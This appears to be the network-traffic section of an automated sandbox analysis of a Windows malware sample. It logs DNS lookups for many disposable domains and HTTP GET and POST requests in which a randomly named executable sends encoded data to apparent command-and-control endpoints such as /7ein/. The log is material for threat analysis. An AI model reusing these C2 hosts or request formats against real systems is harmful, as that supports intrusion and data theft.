                            Jul 16, 2024 07:24:33.499726057 CEST4978180192.168.2.464.46.102.70
                            Jul 16, 2024 07:24:33.504626989 CEST804978164.46.102.70192.168.2.4
                            Jul 16, 2024 07:24:38.543243885 CEST4978280192.168.2.43.33.130.190
                            Jul 16, 2024 07:24:38.548120022 CEST80497823.33.130.190192.168.2.4
                            Jul 16, 2024 07:24:38.548190117 CEST4978280192.168.2.43.33.130.190
                            Jul 16, 2024 07:24:38.550257921 CEST4978280192.168.2.43.33.130.190
                            Jul 16, 2024 07:24:38.555114031 CEST80497823.33.130.190192.168.2.4
                            Jul 16, 2024 07:24:39.032862902 CEST80497823.33.130.190192.168.2.4
                            Jul 16, 2024 07:24:39.039736986 CEST4978280192.168.2.43.33.130.190
                            Jul 16, 2024 07:24:40.063590050 CEST4978280192.168.2.43.33.130.190
                            Jul 16, 2024 07:24:40.068687916 CEST80497823.33.130.190192.168.2.4
                            Jul 16, 2024 07:24:41.082190990 CEST4978380192.168.2.43.33.130.190
                            Jul 16, 2024 07:24:41.221940994 CEST80497833.33.130.190192.168.2.4
                            Jul 16, 2024 07:24:41.222285032 CEST4978380192.168.2.43.33.130.190
                            Jul 16, 2024 07:24:41.226093054 CEST4978380192.168.2.43.33.130.190
                            Jul 16, 2024 07:24:41.230870962 CEST80497833.33.130.190192.168.2.4
                            Jul 16, 2024 07:24:41.691652060 CEST80497833.33.130.190192.168.2.4
                            Jul 16, 2024 07:24:41.698275089 CEST4978380192.168.2.43.33.130.190
                            Jul 16, 2024 07:24:42.735626936 CEST4978380192.168.2.43.33.130.190
                            Jul 16, 2024 07:24:42.753082037 CEST80497833.33.130.190192.168.2.4
                            Jul 16, 2024 07:24:43.754091024 CEST4978480192.168.2.43.33.130.190
                            Jul 16, 2024 07:24:43.759284973 CEST80497843.33.130.190192.168.2.4
                            Jul 16, 2024 07:24:43.761931896 CEST4978480192.168.2.43.33.130.190
                            Jul 16, 2024 07:24:43.766119003 CEST4978480192.168.2.43.33.130.190
                            Jul 16, 2024 07:24:43.776472092 CEST80497843.33.130.190192.168.2.4
                            Jul 16, 2024 07:24:43.776926041 CEST80497843.33.130.190192.168.2.4
                            Jul 16, 2024 07:24:43.776971102 CEST80497843.33.130.190192.168.2.4
                            Jul 16, 2024 07:24:43.777324915 CEST80497843.33.130.190192.168.2.4
                            Jul 16, 2024 07:24:43.777424097 CEST80497843.33.130.190192.168.2.4
                            Jul 16, 2024 07:24:43.777451992 CEST80497843.33.130.190192.168.2.4
                            Jul 16, 2024 07:24:43.777479887 CEST80497843.33.130.190192.168.2.4
                            Jul 16, 2024 07:24:43.777508020 CEST80497843.33.130.190192.168.2.4
                            Jul 16, 2024 07:24:43.777534962 CEST80497843.33.130.190192.168.2.4
                            Jul 16, 2024 07:24:44.219959021 CEST80497843.33.130.190192.168.2.4
                            Jul 16, 2024 07:24:44.220030069 CEST4978480192.168.2.43.33.130.190
                            Jul 16, 2024 07:24:45.266788960 CEST4978480192.168.2.43.33.130.190
                            Jul 16, 2024 07:24:45.272085905 CEST80497843.33.130.190192.168.2.4
                            Jul 16, 2024 07:24:46.285514116 CEST4978580192.168.2.43.33.130.190
                            Jul 16, 2024 07:24:46.290601015 CEST80497853.33.130.190192.168.2.4
                            Jul 16, 2024 07:24:46.290668964 CEST4978580192.168.2.43.33.130.190
                            Jul 16, 2024 07:24:46.292792082 CEST4978580192.168.2.43.33.130.190
                            Jul 16, 2024 07:24:46.297702074 CEST80497853.33.130.190192.168.2.4
                            Jul 16, 2024 07:24:46.751651049 CEST80497853.33.130.190192.168.2.4
                            Jul 16, 2024 07:24:46.751707077 CEST80497853.33.130.190192.168.2.4
                            Jul 16, 2024 07:24:46.751790047 CEST4978580192.168.2.43.33.130.190
                            Jul 16, 2024 07:24:46.754673958 CEST4978580192.168.2.43.33.130.190
                            Jul 16, 2024 07:24:46.759512901 CEST80497853.33.130.190192.168.2.4
                            Jul 16, 2024 07:24:52.186522961 CEST4978680192.168.2.423.105.215.248
                            Jul 16, 2024 07:24:52.191437960 CEST804978623.105.215.248192.168.2.4
                            Jul 16, 2024 07:24:52.191513062 CEST4978680192.168.2.423.105.215.248
                            Jul 16, 2024 07:24:52.193397999 CEST4978680192.168.2.423.105.215.248
                            Jul 16, 2024 07:24:52.198168993 CEST804978623.105.215.248192.168.2.4
                            Jul 16, 2024 07:24:52.797907114 CEST804978623.105.215.248192.168.2.4
                            Jul 16, 2024 07:24:52.797923088 CEST804978623.105.215.248192.168.2.4
                            Jul 16, 2024 07:24:52.798012972 CEST4978680192.168.2.423.105.215.248
                            Jul 16, 2024 07:24:53.707792044 CEST4978680192.168.2.423.105.215.248
                            Jul 16, 2024 07:24:54.723507881 CEST4978780192.168.2.423.105.215.248
                            Jul 16, 2024 07:24:54.728914976 CEST804978723.105.215.248192.168.2.4
                            Jul 16, 2024 07:24:54.728984118 CEST4978780192.168.2.423.105.215.248
                            Jul 16, 2024 07:24:54.731209040 CEST4978780192.168.2.423.105.215.248
                            Jul 16, 2024 07:24:54.736059904 CEST804978723.105.215.248192.168.2.4
                            Jul 16, 2024 07:24:55.313714027 CEST804978723.105.215.248192.168.2.4
                            Jul 16, 2024 07:24:55.313745975 CEST804978723.105.215.248192.168.2.4
                            Jul 16, 2024 07:24:55.314815044 CEST4978780192.168.2.423.105.215.248
                            Jul 16, 2024 07:24:56.235600948 CEST4978780192.168.2.423.105.215.248
                            Jul 16, 2024 07:24:57.255846024 CEST4978880192.168.2.423.105.215.248
                            Jul 16, 2024 07:24:57.260776997 CEST804978823.105.215.248192.168.2.4
                            Jul 16, 2024 07:24:57.263904095 CEST4978880192.168.2.423.105.215.248
                            Jul 16, 2024 07:24:57.267774105 CEST4978880192.168.2.423.105.215.248
                            Jul 16, 2024 07:24:57.272768021 CEST804978823.105.215.248192.168.2.4
                            Jul 16, 2024 07:24:57.272799969 CEST804978823.105.215.248192.168.2.4
                            Jul 16, 2024 07:24:57.272849083 CEST804978823.105.215.248192.168.2.4
                            Jul 16, 2024 07:24:57.272866011 CEST804978823.105.215.248192.168.2.4
                            Jul 16, 2024 07:24:57.272877932 CEST804978823.105.215.248192.168.2.4
                            Jul 16, 2024 07:24:57.272972107 CEST804978823.105.215.248192.168.2.4
                            Jul 16, 2024 07:24:57.273004055 CEST804978823.105.215.248192.168.2.4
                            Jul 16, 2024 07:24:57.273031950 CEST804978823.105.215.248192.168.2.4
                            Jul 16, 2024 07:24:57.273058891 CEST804978823.105.215.248192.168.2.4
                            Jul 16, 2024 07:24:57.936101913 CEST804978823.105.215.248192.168.2.4
                            Jul 16, 2024 07:24:57.937226057 CEST804978823.105.215.248192.168.2.4
                            Jul 16, 2024 07:24:57.937330008 CEST4978880192.168.2.423.105.215.248
                            Jul 16, 2024 07:24:58.766763926 CEST4978880192.168.2.423.105.215.248
                            Jul 16, 2024 07:24:59.786637068 CEST4978980192.168.2.423.105.215.248
                            Jul 16, 2024 07:24:59.792413950 CEST804978923.105.215.248192.168.2.4
                            Jul 16, 2024 07:24:59.794187069 CEST4978980192.168.2.423.105.215.248
                            Jul 16, 2024 07:24:59.798352003 CEST4978980192.168.2.423.105.215.248
                            Jul 16, 2024 07:24:59.803293943 CEST804978923.105.215.248192.168.2.4
                            Jul 16, 2024 07:25:00.368628025 CEST804978923.105.215.248192.168.2.4
                            Jul 16, 2024 07:25:00.368678093 CEST804978923.105.215.248192.168.2.4
                            Jul 16, 2024 07:25:00.368756056 CEST4978980192.168.2.423.105.215.248
                            Jul 16, 2024 07:25:00.371581078 CEST4978980192.168.2.423.105.215.248
                            Jul 16, 2024 07:25:00.376395941 CEST804978923.105.215.248192.168.2.4
                            Jul 16, 2024 07:25:05.829782963 CEST4979080192.168.2.43.33.130.190
                            Jul 16, 2024 07:25:05.834737062 CEST80497903.33.130.190192.168.2.4
                            Jul 16, 2024 07:25:05.837243080 CEST4979080192.168.2.43.33.130.190
                            Jul 16, 2024 07:25:05.837614059 CEST4979080192.168.2.43.33.130.190
                            Jul 16, 2024 07:25:05.842777967 CEST80497903.33.130.190192.168.2.4
                            Jul 16, 2024 07:25:06.302624941 CEST80497903.33.130.190192.168.2.4
                            Jul 16, 2024 07:25:06.302696943 CEST4979080192.168.2.43.33.130.190

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jul 16, 2024 07:21:44.155839920 CEST5704653192.168.2.41.1.1.1
                            Jul 16, 2024 07:21:44.171042919 CEST53570461.1.1.1192.168.2.4
                            Jul 16, 2024 07:21:59.723273039 CEST5996153192.168.2.41.1.1.1
                            Jul 16, 2024 07:21:59.732860088 CEST53599611.1.1.1192.168.2.4
                            Jul 16, 2024 07:22:07.785259962 CEST4920053192.168.2.41.1.1.1
                            Jul 16, 2024 07:22:07.798978090 CEST53492001.1.1.1192.168.2.4
                            Jul 16, 2024 07:22:20.958830118 CEST5141753192.168.2.41.1.1.1
                            Jul 16, 2024 07:22:21.253191948 CEST53514171.1.1.1192.168.2.4
                            Jul 16, 2024 07:22:34.493822098 CEST6423553192.168.2.41.1.1.1
                            Jul 16, 2024 07:22:34.507065058 CEST53642351.1.1.1192.168.2.4
                            Jul 16, 2024 07:22:48.129128933 CEST5323153192.168.2.41.1.1.1
                            Jul 16, 2024 07:22:48.144511938 CEST53532311.1.1.1192.168.2.4
                            Jul 16, 2024 07:23:01.411633015 CEST6178753192.168.2.41.1.1.1
                            Jul 16, 2024 07:23:02.061860085 CEST53617871.1.1.1192.168.2.4
                            Jul 16, 2024 07:23:16.176028013 CEST6101153192.168.2.41.1.1.1
                            Jul 16, 2024 07:23:16.837920904 CEST53610111.1.1.1192.168.2.4
                            Jul 16, 2024 07:23:30.067934036 CEST5596953192.168.2.41.1.1.1
                            Jul 16, 2024 07:23:30.101463079 CEST53559691.1.1.1192.168.2.4
                            Jul 16, 2024 07:23:43.849036932 CEST5380153192.168.2.41.1.1.1
                            Jul 16, 2024 07:23:43.951368093 CEST53538011.1.1.1192.168.2.4
                            Jul 16, 2024 07:23:57.287734032 CEST5358453192.168.2.41.1.1.1
                            Jul 16, 2024 07:23:57.302839041 CEST53535841.1.1.1192.168.2.4
                            Jul 16, 2024 07:24:10.582833052 CEST5614653192.168.2.41.1.1.1
                            Jul 16, 2024 07:24:10.600626945 CEST53561461.1.1.1192.168.2.4
                            Jul 16, 2024 07:24:24.979728937 CEST5411453192.168.2.41.1.1.1
                            Jul 16, 2024 07:24:25.417280912 CEST53541141.1.1.1192.168.2.4
                            Jul 16, 2024 07:24:38.504750013 CEST5653553192.168.2.41.1.1.1
                            Jul 16, 2024 07:24:38.540661097 CEST53565351.1.1.1192.168.2.4
                            Jul 16, 2024 07:24:51.770481110 CEST5060053192.168.2.41.1.1.1
                            Jul 16, 2024 07:24:52.184094906 CEST53506001.1.1.1192.168.2.4
                            Jul 16, 2024 07:25:05.817091942 CEST5222953192.168.2.41.1.1.1
                            Jul 16, 2024 07:25:05.827225924 CEST53522291.1.1.1192.168.2.4

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Jul 16, 2024 07:21:44.155839920 CEST192.168.2.41.1.1.10x7bd7Standard query (0)www.kundalisathi.comA (IP address)IN (0x0001)false
                            Jul 16, 2024 07:21:59.723273039 CEST192.168.2.41.1.1.10x3a58Standard query (0)www.quests-galxe.comA (IP address)IN (0x0001)false
                            Jul 16, 2024 07:22:07.785259962 CEST192.168.2.41.1.1.10x6acbStandard query (0)www.quixaclienti.comA (IP address)IN (0x0001)false
                            Jul 16, 2024 07:22:20.958830118 CEST192.168.2.41.1.1.10x9bf5Standard query (0)www.mysticriverpath.comA (IP address)IN (0x0001)false
                            Jul 16, 2024 07:22:34.493822098 CEST192.168.2.41.1.1.10xcb78Standard query (0)www.bearclaw.botA (IP address)IN (0x0001)false
                            Jul 16, 2024 07:22:48.129128933 CEST192.168.2.41.1.1.10xfbf7Standard query (0)www.focusonsocials.comA (IP address)IN (0x0001)false
                            Jul 16, 2024 07:23:01.411633015 CEST192.168.2.41.1.1.10x2160Standard query (0)www.onlandtoy.comA (IP address)IN (0x0001)false
                            Jul 16, 2024 07:23:16.176028013 CEST192.168.2.41.1.1.10x9220Standard query (0)www.quiluxx.topA (IP address)IN (0x0001)false
                            Jul 16, 2024 07:23:30.067934036 CEST192.168.2.41.1.1.10x32f8Standard query (0)www.bb58cc.comA (IP address)IN (0x0001)false
                            Jul 16, 2024 07:23:43.849036932 CEST192.168.2.41.1.1.10x5b12Standard query (0)www.bestandpure.comA (IP address)IN (0x0001)false
                            Jul 16, 2024 07:23:57.287734032 CEST192.168.2.41.1.1.10x6f79Standard query (0)www.rtpdewata4d-16.xyzA (IP address)IN (0x0001)false
                            Jul 16, 2024 07:24:10.582833052 CEST192.168.2.41.1.1.10x4b12Standard query (0)www.itsjojosiwas.comA (IP address)IN (0x0001)false
                            Jul 16, 2024 07:24:24.979728937 CEST192.168.2.41.1.1.10xd665Standard query (0)www.kera333.orgA (IP address)IN (0x0001)false
                            Jul 16, 2024 07:24:38.504750013 CEST192.168.2.41.1.1.10xeb70Standard query (0)www.lmsforsme.comA (IP address)IN (0x0001)false
                            Jul 16, 2024 07:24:51.770481110 CEST192.168.2.41.1.1.10xbdf3Standard query (0)www.3333711m14.shopA (IP address)IN (0x0001)false
                            Jul 16, 2024 07:25:05.817091942 CEST192.168.2.41.1.1.10xd520Standard query (0)www.iitaccounting.comA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Jul 16, 2024 07:21:44.171042919 CEST1.1.1.1192.168.2.40x7bd7No error (0)www.kundalisathi.comkundalisathi.comCNAME (Canonical name)IN (0x0001)false
                            Jul 16, 2024 07:21:44.171042919 CEST1.1.1.1192.168.2.40x7bd7No error (0)kundalisathi.com3.33.130.190A (IP address)IN (0x0001)false
                            Jul 16, 2024 07:21:44.171042919 CEST1.1.1.1192.168.2.40x7bd7No error (0)kundalisathi.com15.197.148.33A (IP address)IN (0x0001)false
                            Jul 16, 2024 07:21:59.732860088 CEST1.1.1.1192.168.2.40x3a58Name error (3)www.quests-galxe.comnonenoneA (IP address)IN (0x0001)false
                            Jul 16, 2024 07:22:07.798978090 CEST1.1.1.1192.168.2.40x6acbNo error (0)www.quixaclienti.comquixaclienti.comCNAME (Canonical name)IN (0x0001)false
                            Jul 16, 2024 07:22:07.798978090 CEST1.1.1.1192.168.2.40x6acbNo error (0)quixaclienti.com3.33.130.190A (IP address)IN (0x0001)false
                            Jul 16, 2024 07:22:07.798978090 CEST1.1.1.1192.168.2.40x6acbNo error (0)quixaclienti.com15.197.148.33A (IP address)IN (0x0001)false
                            Jul 16, 2024 07:22:21.253191948 CEST1.1.1.1192.168.2.40x9bf5No error (0)www.mysticriverpath.commysticriverpath.comCNAME (Canonical name)IN (0x0001)false
                            Jul 16, 2024 07:22:21.253191948 CEST1.1.1.1192.168.2.40x9bf5No error (0)mysticriverpath.com216.194.173.237A (IP address)IN (0x0001)false
                            Jul 16, 2024 07:22:34.507065058 CEST1.1.1.1192.168.2.40xcb78No error (0)www.bearclaw.botbearclaw.botCNAME (Canonical name)IN (0x0001)false
                            Jul 16, 2024 07:22:34.507065058 CEST1.1.1.1192.168.2.40xcb78No error (0)bearclaw.bot3.33.130.190A (IP address)IN (0x0001)false
                            Jul 16, 2024 07:22:34.507065058 CEST1.1.1.1192.168.2.40xcb78No error (0)bearclaw.bot15.197.148.33A (IP address)IN (0x0001)false
                            Jul 16, 2024 07:22:48.144511938 CEST1.1.1.1192.168.2.40xfbf7No error (0)www.focusonsocials.com212.227.172.254A (IP address)IN (0x0001)false
                            Jul 16, 2024 07:23:02.061860085 CEST1.1.1.1192.168.2.40x2160No error (0)www.onlandtoy.com43.157.128.107A (IP address)IN (0x0001)false
                            Jul 16, 2024 07:23:16.837920904 CEST1.1.1.1192.168.2.40x9220No error (0)www.quiluxx.top203.161.41.205A (IP address)IN (0x0001)false
                            Jul 16, 2024 07:23:30.101463079 CEST1.1.1.1192.168.2.40x32f8No error (0)www.bb58cc.com103.176.91.154A (IP address)IN (0x0001)false
                            Jul 16, 2024 07:23:43.951368093 CEST1.1.1.1192.168.2.40x5b12No error (0)www.bestandpure.com3.33.244.179A (IP address)IN (0x0001)false
                            Jul 16, 2024 07:23:57.302839041 CEST1.1.1.1192.168.2.40x6f79No error (0)www.rtpdewata4d-16.xyz104.21.89.46A (IP address)IN (0x0001)false
                            Jul 16, 2024 07:23:57.302839041 CEST1.1.1.1192.168.2.40x6f79No error (0)www.rtpdewata4d-16.xyz172.67.156.115A (IP address)IN (0x0001)false
                            Jul 16, 2024 07:24:10.600626945 CEST1.1.1.1192.168.2.40x4b12No error (0)www.itsjojosiwas.com172.67.196.1A (IP address)IN (0x0001)false
                            Jul 16, 2024 07:24:10.600626945 CEST1.1.1.1192.168.2.40x4b12No error (0)www.itsjojosiwas.com104.21.21.24A (IP address)IN (0x0001)false
                            Jul 16, 2024 07:24:25.417280912 CEST1.1.1.1192.168.2.40xd665No error (0)www.kera333.orgkera333.orgCNAME (Canonical name)IN (0x0001)false
                            Jul 16, 2024 07:24:25.417280912 CEST1.1.1.1192.168.2.40xd665No error (0)kera333.org64.46.102.70A (IP address)IN (0x0001)false
                            Jul 16, 2024 07:24:38.540661097 CEST1.1.1.1192.168.2.40xeb70No error (0)www.lmsforsme.comlmsforsme.comCNAME (Canonical name)IN (0x0001)false
                            Jul 16, 2024 07:24:38.540661097 CEST1.1.1.1192.168.2.40xeb70No error (0)lmsforsme.com3.33.130.190A (IP address)IN (0x0001)false
                            Jul 16, 2024 07:24:38.540661097 CEST1.1.1.1192.168.2.40xeb70No error (0)lmsforsme.com15.197.148.33A (IP address)IN (0x0001)false
                            Jul 16, 2024 07:24:52.184094906 CEST1.1.1.1192.168.2.40xbdf3No error (0)www.3333711m14.shopnbq.ssywan.comCNAME (Canonical name)IN (0x0001)false
                            Jul 16, 2024 07:24:52.184094906 CEST1.1.1.1192.168.2.40xbdf3No error (0)nbq.ssywan.com23.105.215.248A (IP address)IN (0x0001)false
                            Jul 16, 2024 07:25:05.827225924 CEST1.1.1.1192.168.2.40xd520No error (0)www.iitaccounting.comiitaccounting.comCNAME (Canonical name)IN (0x0001)false
                            Jul 16, 2024 07:25:05.827225924 CEST1.1.1.1192.168.2.40xd520No error (0)iitaccounting.com3.33.130.190A (IP address)IN (0x0001)false
                            Jul 16, 2024 07:25:05.827225924 CEST1.1.1.1192.168.2.40xd520No error (0)iitaccounting.com15.197.148.33A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • www.kundalisathi.com
                            • www.quixaclienti.com
                            • www.mysticriverpath.com
                            • www.bearclaw.bot
                            • www.focusonsocials.com
                            • www.onlandtoy.com
                            • www.quiluxx.top
                            • www.bb58cc.com
                            • www.bestandpure.com
                            • www.rtpdewata4d-16.xyz
                            • www.itsjojosiwas.com
                            • www.kera333.org
                            • www.lmsforsme.com
                            • www.3333711m14.shop
                            • www.iitaccounting.com

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.4497363.33.130.190801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:21:44.187586069 CEST370OUTGET /esfu/?UbV=gh5yKdvhconYF1IQdW8vdxSZdz4d9+SHwgQXx3mIDLUkg8HVZvA84ZxaBoLmPIr804qY2VBHslVt+Qh3tR7ZY1ctik1AAurafdW52ChWUJGqDg8qNhYLIWg=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.kundalisathi.com
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:21:44.670972109 CEST395INHTTP/1.1 200 OK
                            Server: openresty
                            Date: Tue, 16 Jul 2024 05:21:44 GMT
                            Content-Type: text/html
                            Content-Length: 255
                            Connection: close
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 55 62 56 3d 67 68 35 79 4b 64 76 68 63 6f 6e 59 46 31 49 51 64 57 38 76 64 78 53 5a 64 7a 34 64 39 2b 53 48 77 67 51 58 78 33 6d 49 44 4c 55 6b 67 38 48 56 5a 76 41 38 34 5a 78 61 42 6f 4c 6d 50 49 72 38 30 34 71 59 32 56 42 48 73 6c 56 74 2b 51 68 33 74 52 37 5a 59 31 63 74 69 6b 31 41 41 75 72 61 66 64 57 35 32 43 68 57 55 4a 47 71 44 67 38 71 4e 68 59 4c 49 57 67 3d 26 59 34 67 70 3d 6d 6c 6c 74 63 72 52 78 63 4c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?UbV=gh5yKdvhconYF1IQdW8vdxSZdz4d9+SHwgQXx3mIDLUkg8HVZvA84ZxaBoLmPIr804qY2VBHslVt+Qh3tR7ZY1ctik1AAurafdW52ChWUJGqDg8qNhYLIWg=&Y4gp=mlltcrRxcL"}</script></head></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.4497383.33.130.190801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:22:07.807704926 CEST643OUTPOST /7ein/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.quixaclienti.com
                            Origin: http://www.quixaclienti.com
                            Referer: http://www.quixaclienti.com/7ein/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 79 67 4a 6f 6c 33 43 63 36 37 59 61 7a 57 50 48 4b 48 47 73 48 62 74 58 45 66 46 76 4f 55 49 72 66 68 30 66 6f 4f 45 45 45 32 46 62 64 43 6b 56 56 4a 4b 5a 31 41 74 34 4d 49 38 70 49 4b 4c 71 49 66 58 43 65 44 46 72 44 59 76 62 68 4c 6c 71 4d 74 45 33 31 61 68 39 63 4d 75 70 4c 54 75 64 38 49 76 43 31 6d 70 66 4f 61 46 49 61 46 4b 2f 44 4f 6a 31 79 78 4e 6f 33 69 6e 6a 6f 51 55 63 62 2b 6e 68 34 37 4f 76 30 44 43 4e 38 4f 45 72 78 63 6a 44 78 32 63 33 63 72 49 4b 79 6e 58 48 41 67 37 69 42 65 55 45 6a 30 48 42 65 67 4b 38 53 68 68 2b 53 4b 64 42 37 59 4a 68 31 39 36 42 43 41 3d 3d
                            Data Ascii: UbV=ygJol3Cc67YazWPHKHGsHbtXEfFvOUIrfh0foOEEE2FbdCkVVJKZ1At4MI8pIKLqIfXCeDFrDYvbhLlqMtE31ah9cMupLTud8IvC1mpfOaFIaFK/DOj1yxNo3injoQUcb+nh47Ov0DCN8OErxcjDx2c3crIKynXHAg7iBeUEj0HBegK8Shh+SKdB7YJh196BCA==


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.4497393.33.130.190801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:22:10.400645971 CEST663OUTPOST /7ein/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 220
                            Cache-Control: max-age=0
                            Host: www.quixaclienti.com
                            Origin: http://www.quixaclienti.com
                            Referer: http://www.quixaclienti.com/7ein/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 79 67 4a 6f 6c 33 43 63 36 37 59 61 79 32 54 48 5a 32 47 73 41 37 74 59 4c 2f 46 76 48 30 49 76 66 68 77 66 6f 50 42 66 48 43 70 62 63 6a 55 56 55 49 4b 5a 30 41 74 34 45 6f 38 67 46 71 4c 78 49 66 72 67 65 42 52 72 44 59 4c 62 68 4f 5a 71 4d 64 34 34 30 4b 68 2f 57 63 75 72 47 7a 75 64 38 49 76 43 31 6d 39 6c 4f 61 64 49 62 32 53 2f 46 72 50 32 30 42 4e 76 6a 79 6e 6a 35 67 55 41 62 2b 6d 30 34 36 69 57 30 42 71 4e 38 50 30 72 78 4a 44 41 72 6d 64 38 54 4c 4a 69 35 6e 32 63 50 53 53 77 49 4d 4a 67 6a 51 47 6b 66 6d 62 6d 44 51 41 70 41 4b 35 79 6d 66 41 56 34 2b 48 49 5a 41 45 78 76 54 64 35 46 64 43 52 5a 59 4b 7a 47 77 33 52 59 49 6b 3d
                            Data Ascii: UbV=ygJol3Cc67Yay2THZ2GsA7tYL/FvH0IvfhwfoPBfHCpbcjUVUIKZ0At4Eo8gFqLxIfrgeBRrDYLbhOZqMd440Kh/WcurGzud8IvC1m9lOadIb2S/FrP20BNvjynj5gUAb+m046iW0BqN8P0rxJDArmd8TLJi5n2cPSSwIMJgjQGkfmbmDQApAK5ymfAV4+HIZAExvTd5FdCRZYKzGw3RYIk=


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.4497403.33.130.190801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:22:12.935842991 CEST10745OUTPOST /7ein/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 10300
                            Cache-Control: max-age=0
                            Host: www.quixaclienti.com
                            Origin: http://www.quixaclienti.com
                            Referer: http://www.quixaclienti.com/7ein/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 79 67 4a 6f 6c 33 43 63 36 37 59 61 79 32 54 48 5a 32 47 73 41 37 74 59 4c 2f 46 76 48 30 49 76 66 68 77 66 6f 50 42 66 48 44 39 62 63 56 49 56 56 72 69 5a 6d 51 74 34 4b 49 38 74 46 71 4b 6a 49 62 2f 6b 65 42 4e 37 44 61 44 62 68 6f 4e 71 45 50 63 34 39 4b 68 2f 59 4d 75 71 4c 54 75 49 38 4d 4c 4f 31 6d 74 6c 4f 61 64 49 62 77 2b 2f 43 2b 6a 32 32 42 4e 6f 33 69 6e 52 6f 51 55 6b 62 2b 2f 50 34 36 6d 47 33 77 4b 4e 38 76 6b 72 30 36 72 41 67 6d 64 2b 57 4c 4a 36 35 6e 36 35 50 53 4f 43 49 4e 38 46 6a 58 32 6b 65 58 71 5a 65 78 52 78 44 35 46 4a 32 73 67 31 32 2b 54 6b 52 68 35 46 2f 79 4a 78 65 38 33 79 56 61 66 41 63 67 76 36 43 38 61 54 6d 51 30 77 75 36 53 69 31 50 35 52 36 49 78 69 51 4e 30 4e 63 43 72 73 61 4d 32 76 53 4e 76 76 78 2b 6a 6e 4a 72 64 43 75 4d 76 73 4c 49 65 37 69 54 6b 32 6f 6a 5a 31 72 51 62 43 6c 7a 4b 45 76 42 6a 57 77 6a 77 61 67 75 34 74 2f 59 46 6f 5a 38 6f 6f 32 46 72 68 74 61 34 58 6b 41 55 2b 79 54 52 54 79 67 4b 4d 30 6d 55 37 63 37 59 7a 70 32 34 36 42 70 [TRUNCATED]
